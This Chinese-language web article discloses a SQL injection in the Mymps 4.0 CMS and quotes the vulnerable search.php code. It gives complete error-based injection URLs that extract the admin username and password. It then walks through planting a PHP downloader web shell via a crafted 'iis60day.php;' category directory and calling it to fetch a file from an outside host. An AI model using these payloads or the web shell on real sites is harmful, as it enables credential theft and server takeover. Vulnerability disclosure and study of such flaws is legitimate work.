来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 受影响的厂商:www.mymps.com.cn是否通杀:4.0版本 其他版本为测试漏洞产生:\mayi\data\info_posttime.php代码?php省略.....$info_posttime = array();/*信息检索的发布时间下拉框选项*///注意单位为天,一周则...
受影响的厂商: www.mymps.com.cn 是否通杀: 4.0版本 其他版本为测试
漏洞产生:
\mayi\data\info_posttime.php代码
<?php 省略..... $info_posttime = array(); /*信息检索的发布时间下拉框选项*/ //注意单位为天,一周则为7,一个月则为30,以此类推 $info_posttime[0] = '不限'; $info_posttime[3] = '3天内'; $info_posttime[7] = '一周内'; $info_posttime[30] = '一个月以内'; $info_posttime[90] = '三个月以内'; ?>
\mayi\search.php代码
一大推....省略... $where .= $posttime != '' ? "AND i.begintime >= (".$timestamp."-".$posttime."*3600*24)" : "";
一大推....省略... $sql = "SELECT i.id,i.html_path,i.begintime,i.title,i.content,i.ismember,i.contact_who,i.begintime,i.catid,c.catname FROM `{$db_mymps}information` AS i LEFT JOIN `{$db_mymps}category` AS c ON i.catid = c.catid WHERE 1 {$where} {$extra_in} ORDER BY i.begintime DESC";
$search['rows_num'] = $rows_num = $db -> getOne("SELECT COUNT(i.id) FROM `{$db_mymps}information` AS i WHERE 1 {$where} {$extra_in}");//没过滤的带入查询了....
注入篇:
爆用户
http://www.2cto.com /info.php?catid=155&areaid=&posttime=3) and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,uname,0x27,0x7e)) from 前缀_admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%20and%20(111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444
爆密码
http://www.2cto.com /info.php?catid=155&areaid=&posttime=3) and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,pwd,0x27,0x7e)) from 前缀_admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%20and%20(111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444 一般前缀是my 完整是my_admin 如果语句不够长自己加,太长去掉...
后台拿shell篇:
登入后台> 栏目设置> 新增栏目
路径存放形式: 自定义目录名 输入:iis60day.php;
栏目内容:
Hey web master,Have a nice day o.O? I hope so! HaHa <?php $str=file_get_contents($_GET['url']); echo file_put_contents($_GET['file'],$str); ?>
如图:
然后关键在这里了... 扩展> 生成网站站务> 选择栏目中选择"关于我们" > 开始生成html
访问 http://www.2cto.com /html/aboutus/iis60day.php;.html?url=http://*.144.*.*/testsec.php&file=4z1.php 如图:
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com